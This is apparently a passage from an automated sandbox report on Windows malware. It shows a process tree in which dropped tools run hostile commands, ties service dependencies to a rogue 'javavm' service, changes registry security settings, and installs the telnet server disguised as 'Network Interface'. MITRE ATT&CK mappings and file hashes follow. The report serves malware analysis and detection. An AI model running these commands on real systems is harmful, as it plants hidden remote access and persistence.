PID:2052
-
-
C:\Windows\Java\classes\sc.exesc failure javavm actions= restart/500 reset= 104⤵
- Executes dropped EXE
- Loads dropped DLL
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1772
-
-
C:\Windows\Java\classes\sc.exesc config lanmanserver depend= javavm4⤵
- Executes dropped EXE
- Loads dropped DLL
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2164
-
-
C:\Windows\Java\classes\sc.exesc config lanmanworkstation depend= javavm4⤵
- Executes dropped EXE
- Loads dropped DLL
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3060
-
-
C:\Windows\Java\classes\sc.exesc config LSASS depend= javavm4⤵
- Executes dropped EXE
- Loads dropped DLL
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1572
-
-
C:\Windows\Java\classes\rgv.exergv -set REG_DWORD \HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters\AutoShareWks=0x000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:844
-
-
C:\Windows\Java\classes\rgv.exergv -set REG_DWORD \HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters\AutoShareServer=0x000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2784
-
-
C:\Windows\Java\classes\rgv.exergv -set REG_DWORD \HKLM\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\DisableWebDAV=0x000000014⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:696
-
-
C:\Windows\Java\classes\rgv.exergv -set REG_DWORD \HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous=0x000000014⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:956
-
-
C:\Windows\Java\classes\rgv.exergv -set REG_SZ \HKLM\SOFTWARE\Microsoft\Ole\EnableDCOM=N4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2564
-
-
C:\Windows\Java\classes\xnet.exexnet stop msjava4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2216
-
-
C:\Windows\Java\classes\xnet.exexnet start javavm4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1568
-
-
C:\Windows\Java\classes\xnet.exexnet install Ntf /b:C:\Windows\system32\tlntsvr.exe /n:"Network Interface" /i:no /s:auto4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1668
-
-
C:\Windows\Java\classes\xnet.exexnet start Ntf4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1652
-
-
C:\Windows\Java\classes\kill.exekill.exe javakitbbs.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
-
-
C:\Windows\Java\classes\javavm.exeC:\Windows\Java\classes\javavm.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1140
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Create or Modify System Process
2Windows Service
2Privilege Escalation
Account Manipulation
1Create or Modify System Process
2Windows Service
2Defense Evasion
Hide Artifacts
3Hidden Files and Directories
2Hidden Users
1Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64KB
MD52be0b20f4893bf3830391342b1668d0a
SHA1186482291249474fc358adb8fdcd0a216d32eae0
SHA25620555e97e625f49ac44c84c36c3fc21bb5d20c0c35b4ff60174870606ca767b4
SHA512976caa55bcb085a25471d97dccd8fc583737e1c6ea4027d59d53ef4bd633b59dfdea97ff15bd830b36f5bcf5eb45702ea6242e01451006f4076afd5d9cb1f0b4
-
Filesize
64KB
MD5841c522dc7db4ae4961a31a491d661df
SHA1fccb082cf288ffd1e947f3f783884cd0a39d9346
SHA25663eaff9a275e67f956b05be0216fe9ccc652f3e2e6d7fda4de01f70e3c977829
SHA512232593c0a3900f6669fe954e418c9e52f340b0b601b6b9023dfae4db965278feaf324e262d19994b5f249666d993aac5496969c9fc5f40386cc4bdbe9936010d
-
Filesize
667B
MD5d67c4330a68ea2e8a32e4ff5e84a19b3
SHA122e2aff209240edb456267c1b2592a7c45a5da91
SHA25648151fe2050d0142e8f28ec55d73edbdc0a9a6502a1204181328761772137252
SHA512e41188c478e38d20238acc5727bae1fe38df854ce6c6826e7003b73e87844229dcdd2d9fd7bc28661be8bac227d25c7da37f680eafd80ffda7def774aa59a17a
-
Filesize
100KB
MD5e44b153a7bb508f116040a4011f8b0a4
SHA1d8a467139a5e7238775ff880c60b82ec052d789e
SHA25657ccb57244b89d2e187253aec1d2266581dfe3dfc467c8e051bcb4ba8734dbbc
SHA512dddb2c4f2bb8615b23df2516a9121dac7cb48f430cb3c30cfbba4f22f8429b3ccee845abe2399aa6156fef22f9d919bb8bdfd1c1bb5ce0bc25868288885c735a
-
Filesize
477B
MD55ced491cbd02bc282ead65b0f5d3a5af
SHA11f2ca3b52399ab77156c1b15274b139e165daf63
SHA256df1489e010c31f51acd429bd24148da8b68126c233af94391feef67b52c151f4
SHA51234f750f1eb12af6690f99d3623f5c00f19608650a225ecb6c2523b349e7fe04cfd1741c0472cb828aa2a7b19c4966d73859f038c0d52803e0eb1cb44ca577cd7
-
Filesize
464B
MD56444969edcdc16b62ad569e8bc1aceaa
SHA193878224cdfae462eff38cd5fa3e4b913e22e67a
SHA256da9a601e50414fa3f9ed0b74dfbc797fe9e9cac40bbfb85ef2e79af739370d45
SHA512a67876ebccfb46b3be71dbf4718750996d481ec1dc4625954f032d089b874a06f4b0998667ee57792845b4602076894b85bafafc772fd362c4d82f90de573960
-
Filesize
168B
MD525cf6449a1104d5b821f3fda946f9d79
SHA1a8185e07962b668e246e9402c5da4338a282c1e2
SHA25629a30a2d24c76430673f7c0d094780c9915ba4bbe275e13f970f5e0c41b8772f
SHA512ee1f0f98ae658d21095ac3a604516d716b0d1fc5f2c387902a43a2526c3a763ef29ccd330ffca28a3ecbba7666e54a57333b490bd9ced15da9ca2192efe9644b
-
Filesize
28KB
MD5f2efc1ae19644c27a8cc187b7f19a074
SHA103a7ddc2823036f9d3806f740377ca7f75eb0a72
SHA2568020454b8f4be95abf8c339a06d3c26032f982ac521389764b46dc73785f0cb1
SHA512c82e56f5eda1d02b04f5b2ed3f23b031782ba231b87d4f5f7bea30cdd28da9cd2b663d8a6193e5a33bfbeab7785646ad34d114afec223ed2ac1ccb5a8f60bce9
-
Filesize
101KB
MD5186e958a270a2754dfb8d61810ea651a
SHA155181d2855a32cd83f8a74264d12b920e1f005c8
SHA2564383a5b3e30fa96a458daeb14be8c2b6c66014530f05906c1559e3f496b0597d
SHA5129ef3084a0de208464cfdc95d299108bb4ae8bb58ebc278d470b958165702a53d5d6be3c72515532b29921b67c14527a9206750fa283d13f046445ab107b63369
-
Filesize
24KB
MD59e0c87fc9797536eaff23ebfe05763cc
SHA1c1121bd40e51b9668c0fa6f12d1001d4a398636a
SHA2563732ad44e26f547fc7edd120c34a3af1aeace7aaa838221defeef2dc7af16839
SHA5121a098edaf6aa19ab80ead01cf6969265794dcaef9826415578514f5b394128ad9790e2194083009a7eaeade6b235d526b2dcb63dc3218f260f3e6be1bee3877a
-
Filesize
74KB
MD5e256b0370b252f2a261c749ad9069ab9
SHA107a96f9de7fdb0ee9dea0d34f2e8ff878bb78e05
SHA25665e9a7b4decc8b61c530e022e1f1a93f2ed121ccbf3973178329a8a8aab8afd1
SHA512f3ddea15d09f92f310883132b00eb1abf1e62cf421c5791d13c82bd5ca21ee5dcd45dc3a620252e9ba5bf276ee2e27535386122d96e16270348fd56198acc51c
-
Filesize
5KB
MD59f76b920bf5c9e52f04e400d85b20458
SHA1d978b365d399914abe7693001af7bf14835d203e
SHA256352bfea11674413e2a9817c94f90ad8ed77791d372623fef64606576e557e69c
SHA5126e02080b21881f4e6f325ffc6f3b781dce2fa58f27668113d391e02579e6f223c4a1e5af3a6e17067f5314722b5bbb9c4330340624b55d4bc6a814e8e6a87834
-
Filesize
633KB
MD5543062f19c468e7bf5769f2156907b32
SHA18665cbc73c1d19138b8dc33891995dd0bb8da87d
SHA2565cfe7a71af5c2767c081af23d149ce26699f391874e9a0219295200e6ada470d
SHA5121742d735a83bed3a9bd1d391ed7265df80f75cc0cecfea2c68d42e6323164b14ee384ea5f9a4a54b29c60ed053ca0350b90a3f7c9537b696dc4b08d9bdba4d9e
-
Filesize
4KB
MD5be2681679407d7f67372b54c126b5c98
SHA1e6bae2a5a13d9b072cb335c616943b5e4ba0298e
SHA25640c7284659a2574dca7fa2bdaee8254e7891470c85f1f7199ab496fa4b914a01
SHA512a3b10982a42da21aaf30760262f1ca0594fe2b6c1a1f69ea1649efaf4bf57e6ca5cfbde578b495ab4ca64364b6a0b771f348ab363b802dd621ceb73dc1c7ed9c
-
Filesize
28KB
MD590c18175befaa9b9960697dce479d927
SHA1c8c88a0778c3e8df77bfda857cc54a535ad198e0
SHA2561327dd2ab90c42f0288d7b534a6664f25f258695549cc654eb99f88379d3e116
SHA512cce9a252837b70c56af17cab0358e1efceb628a5752edad7aabcd07011f4960adcf53a014f4b84cf99901df4f4b77fd280272fb5455e61681023aee9e8bfb2a2
-
Filesize
20KB
MD5a376812a016f72b676c5f571962c3a93
SHA1f372003f2b85d33ffe33e5f3924c003a99a154df
SHA256de79e5c557429b09b54512421995e722bce8b677e95b4db62c7705cb16764ada
SHA512f77f2936a4a786479aa62f20c33d312e294c143d5afd0702255880ef953938b67937fc74d67cbc7a7d2b7975cda0758efb17b0de3ad02a972af5f3dfe3d577db
-
Filesize
997B
MD575bdc7bd2ef5cfd8882e2c720d83cf9b
SHA1bdcc2c80f064f3547a17d4bd3aeaa738d1cd9d83
SHA2561f50a401f11ee498beb2980b802039f4ace9e9e9c3c93cf3341574ab0dea6374
SHA5122f94d834902a206041afbe325cba240509924ae1f39d98cc46de5d42e1f885e14c2aaef0b8d3a7a14600a4eb9b2f6facbe841870f07dd53529c570812725e534
-
Filesize
951B
MD5fa73667b5c06d524547dc4a421fda7d0
SHA1baaa2eac623a4062ad62aaadaede11b20898c009
SHA25605e56605cb17622f7eae4c6d53001ecdff8eb610e39f4057141f8c0b61e0ad10
SHA5124297dfc3ef504f708bfcb37a51c5e24ecf41e21e0eb56b73a66d9e9b1747f6427b88740c678b247863312f1a61d5752f8517857352fa5aaf54be541372b96d07
-
Filesize
16KB
MD561120a568434fc9c9a4899ca91fa2a61
SHA1b0fe6a5cd47d2a36a1f13d3f6f53948f0dccfe5f
SHA256b99a9ea08331d837dbb5ec21850cd8f485ecdf916aaafe01945d99f55a9df6d1
SHA51297beae4ddada51829055a0d5ff20f79af0ac48a480ee78fda6dc4676eafdbdad72b6e642bff3ddf3f728948f01f2dc79b0e6c1b49195ae6e522eed3fb9fa36bb
-
Filesize
236KB
MD54890caaa9ab8d4b2f12e7beee986ed5a
SHA156e1631d3840e1effad42b2c2b1927fe9bc7e02c
SHA2563ae1ee77b6564cea40164f3ef82724356cb2d1097e4b83f76e6229e21ae290d4
SHA5128c551538449680fdce035f912f16f75ef776fd410fc6038e19da5aea63c9c693613346a38e33b98efabb9a49ea36bc8b68c3d9b767ffed57c7d86edabd13f181
-
Filesize
283B
MD5420ce0bdb9a6c3dae71f2378e3d8efa5
SHA150864ac527c101bf1bf8c7ee7d45b9e9fe0ccbd6
SHA256cfe5f0114add09bccdda67d4509516f3baceef88d3153188eb56cbb51216fb21
SHA512ed08867c2a78e26be3d3bda99155851095621d277f3dbd69757704c33fafaf3cf791783280ea57c50760ced37c040c3690f84b042b22c5032bc82c0696bae237
-
Filesize
32KB
MD5601e236656e22a4290855ac6a73b3060
SHA168ea8712ce455d491a4e2b693e98fad215643023
SHA256b767b0e54fbdf9f8ac5f01863d2a0a6cde75c235a97d57dddb49de35018d41f5
SHA5128eb08b87a6183b9b64da7ee3eda585d4cd5b36298f28d94694f6ce3c195d4cef8b3126e9ba7c0fa78798cc218fd586637297f9375588dd2f2217d94b5d9d4356
-
Filesize
20KB
MD5006900af4ccb2301af9f1e129d7d17f4
SHA12f16dcbb6c77a8b68a84d35a98d7385092e23077
SHA2563937287496e3eba97452178fe56a81113cc35a59e20cb6f1843b7d49f55bc655
SHA512a0ca8dc7f51dbcd57820d0b2128af5f8434263253108ca6153da6ec875d4d1d944964962115bcb52a5d0b5fde5294b6f315c78af620cb61a810cf0acd26e9e18
-
Filesize
126B
MD5a043607e5a8945539fc126c4212b810d
SHA1271cf9d7ea60e5499aef367f21ca8ad0fd48a247
SHA256deffcdd043b5be8640834fb253cba41264572363902f2ccba1d4c1ba5c47412f
SHA512da2cca2095d8d3f6fc865247a6ad98285b8fea0c21bf5411c2a1e7b3e56a0b5a412145819f41b5aeb7af7551101c0ffa216f026764db4b0259f48ec7361806c3
-
Filesize
149B
MD518c7105888def33184d87a0ac25fa9ac
SHA15fe63850a27b1913ef46371fb4b22f95884dd7a5
SHA2566e3a811874bc8f147a146e3bcfea1ff9aa0decef29b6e6ce844095ccd597827e
SHA5120e1794a67da2e3b842bf32d656cc7abdd8e1d15e534c4008a142a1530c8d0d50c78b1d31e084b4408753b44a7d764d8f24247752b1fac9e0901f1c1d9af56698
-
Filesize
136B
MD55ab3fd11acf94c521713be16edec38e4
SHA1d6647025385b5dc9018bd9db7d6257905ff2efe0
SHA256d34a15bf6baf122d5f8796042029434bc8f3d78b8025e2e126229af08474abef
SHA51247f360271f18c8c5ee9a5435f11169d862231d5960775fc0ef930722ff63a9f7071b93cd560f4e8e6ef8b639140c2365ec6ba521735ccc040587cda49fb63d31
-
Filesize
1KB
MD5e6b158212d01ab5f0a20131b99d11c1f
SHA1e42abeada213e502054fe4d1a8768099df5bc67c
SHA2562a48c111a90b303c23cf948ea1d7dadeec2e66ab19d0a96f4eeb47b52e6f88aa
SHA512e0ff79f4b43ddad0300cfd8a52a452df74d25ba6b01bb168c70d6d61093b81236d6283259a89f736293b589e5e9a69a8634d1cfbc6c03b7cd78235913e73b8e8
-
Filesize
763B
MD52642bbc169d323ca3be07f0e9bec2619
SHA1ebb7cda7c7ce73f909dd2f8d33a19a70c4ffb4f3
SHA2561e6d150764139cb5ae8de027740878bfb7a4657936110ce08a7725edd1e67dbf
SHA512f334b354acc0ded25f8de699241f38a5e6773cfccd34498562e5b97ea22614cf9e53feabac69918e4acfc32f8f26c6df8ef72652d906df0f6924b6d0c1c9b9cc
-
Filesize
88KB
MD52d0c1b9de2fd4884ef19198159d01e1a
SHA1d6c93bef0d604dc4e0c8b8187c75498cc9b585a0
SHA2561fd0ba721c8493f4560c5d4a7e811f7d94cb6bd40e916843fa0b309bac047e41
SHA5129abc89fec58cb02ab6d815ee8bc7381a137e978d651ac7c1f40519de0605e326f7c22af78e156adfab95525f01ebcc51334d5ae4e3e9bcb4c6f773fdc634a0f7
-
Filesize
34KB
MD57a2cbc362a7b514b807459d470aefb13
SHA1744ef594a67ffa74378391fc3f063507ced8da3e
SHA256da2cac5c1677ae4417664b6e5030ed9b8bc168895bfe6d2ba0c502b17315755f
SHA512b4652bc2895dafbad38092c93dd584ab9104a09b2de91149ae348715a33c6324977679c4fc4c84361e179a7365b6e1b66e05fda52fd3245bae531f28a44476d5